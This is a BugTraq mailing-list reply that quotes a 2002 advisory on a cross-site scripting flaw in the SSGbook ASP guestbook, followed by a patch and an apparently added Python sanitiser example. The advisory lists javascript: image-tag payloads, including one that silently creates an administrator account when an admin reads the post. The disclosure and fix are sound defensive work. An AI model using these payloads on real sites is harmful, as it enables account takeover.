BugTraq
Re: SSGbook (ASP)
Oct 01 2003 09:11PM
Terry Bankert (tbankert script-shed com)
In-Reply-To: <F127ak1HTJcwXAtPyFC00019ee5 (at) hotmail (dot) com [email concealed]>
This issue has been fixed
>From: "Frog Man" <leseulfrog (at) hotmail (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: SSGbook (ASP)
>Date: Tue, 08 Oct 2002 19:31:54 +0200
>
>Information :
>°°°°°°°°°°°°°
>Product : SSGbook
>Language : ASP
>Tested version : 1
>Website : http://www.script-shed.com
>Problem : Cross Site Scripting
>
>PHP Code / location :
>°°°°°°°°°°°°°°°°°°°°°
>----------------- config.asp ----------------------
>fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
>fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
>fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
>fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
>fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
>fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
>----------------- config.asp ----------------------
>
>Exploit :
>°°°°°°°°°
>[image]javascript:{SCRIPT}[/image]
>[img=right]javascript:{SCRIPT}[/img=right]
>[image=right]javascript:{SCRIPT}[/image=right]
>[img=left]javascript:{SCRIPT}[/img=left]
>[image=left]javascript:{SCRIPT}[/image=left]
>[img]javascript:{SCRIPT}[/img]
>
>
>e.g. :
>[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]
>
>Adds an admin if an admin reads it. Login : Pom, Password : turlututu
>
>Patch :
>°°°°°°°
>In config.asp :
>Add this line :
>
> strOutput = Replace(strOutput, chr(34), "&quot;")
>
>after
>
>----------------------------------------------
> strOutput = Replace(strOutput, "<", "&lt;")
> strOutput = Replace(strOutput, ">", "&gt;")
>----------------------------------------------
>
>And replace these lines :
>
>
>------------------------------------------------
> fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
> fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
> fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>")
> fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>")
> fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")
>------------------------------------------------
>
>
>by :
>
>------------------------------------------------
> fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" border=0>")
> fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>")
> fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>")
> fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>")
> fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")
>------------------------------------------------
>
>
>
>
>More details in French :
>http://www.frog-man.org/tutos/SSGbook.txt
>
>translated by Google :
>http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
>
>
>frog-m@n
>
>
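The two parts of the quoted patch (escaping the double quote in output and only expanding image tags whose URL starts with `http://`) can be modelled as follows. This is an added Python example, not SSGbook's ASP code: `safe_image_url` and `render_images` are hypothetical names, and it goes beyond the patch by also accepting `https` and by validating the scheme case-insensitively.

```python
import html
import re
from urllib.parse import urlsplit

# Tag names come from the config.asp lines quoted in the advisory.
IMG_TAG = re.compile(r"\[(img|image)(?:=(left|right))?\](.*?)\[/\1(?:=\2)?\]",
                     re.IGNORECASE | re.DOTALL)
ALLOWED_SCHEMES = {"http", "https"}  # assumption: https allowed as well


def safe_image_url(raw):
    """Return raw if it is an absolute http(s) URL, otherwise None."""
    # Browsers skip tabs and newlines inside a scheme name, so any space or
    # control character is rejected rather than normalised.
    if re.search(r"[\x00-\x20\x7f]", raw):
        return None
    try:
        parts = urlsplit(raw)
    except ValueError:
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return raw


def render_images(message):
    """Escape the whole message, then expand only validated image tags."""
    escaped = html.escape(message, quote=True)  # covers <, >, & and quotes

    def expand(match):
        align = match.group(2)
        url = safe_image_url(html.unescape(match.group(3)))
        if url is None:
            return match.group(0)  # rejected tag stays as inert text
        align_attr = f' align="{align.lower()}"' if align else ""
        src = html.escape(url, quote=True)
        return f'<img{align_attr} src="{src}" border="0">'

    return IMG_TAG.sub(expand, escaped)


if __name__ == "__main__":
    # Constructed sample posts, not taken from a real guestbook.
    for post in ('[img]http://example.com/a.png[/img]',
                 '[image]javascript:alert(1)[/image]',
                 '[img]http://example.com/a.png"onerror="x[/img]'):
        print(render_images(post))
```

A rejected tag is left in the page as escaped literal text, so a reviewer can still see what was submitted.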